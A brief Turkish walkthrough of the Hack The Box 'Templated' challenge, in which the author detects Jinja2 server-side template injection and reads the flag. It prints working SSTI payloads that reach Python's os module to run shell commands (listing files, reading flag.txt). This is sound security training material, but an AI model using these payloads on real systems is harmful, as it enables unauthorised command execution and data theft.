Hack The Box: Templated Walkthrough — giselle
Hack The Box: Templated Walkthrough

Merhaba, bugün Hack The Box’ta Templated Challenge çözümünü anlatacağım.

Bizi karşılayan ilk ekran bu. Flask/Jinja2 üzerine araştırma yapmaya başladım ve SSTI’ya karşı savunmasız olduğunu öğrendim. Bunu doğrulamak için {{7 * 7}} payload’ını gönderdim ve çalıştığını gördüm.

Ve gerçekten çalıştı! Yanıtı aldık. Jinja2 ile SSTI hakkında daha fazla bilgi için:
[https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/]

Dosyaları listelemek için şu komutu kullandım ve flag.txt dosyasını gördüm:
1{{request.application.__globals__.__builtins__.__import__('os').popen('ls -a').read()}}
Dosyayı okuyarak bayrağı aldım:
1{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}Bayrağı bulduk, challenge tamamlandı. Hacklemaya devam!
Pratik mükemmelleştirir. :)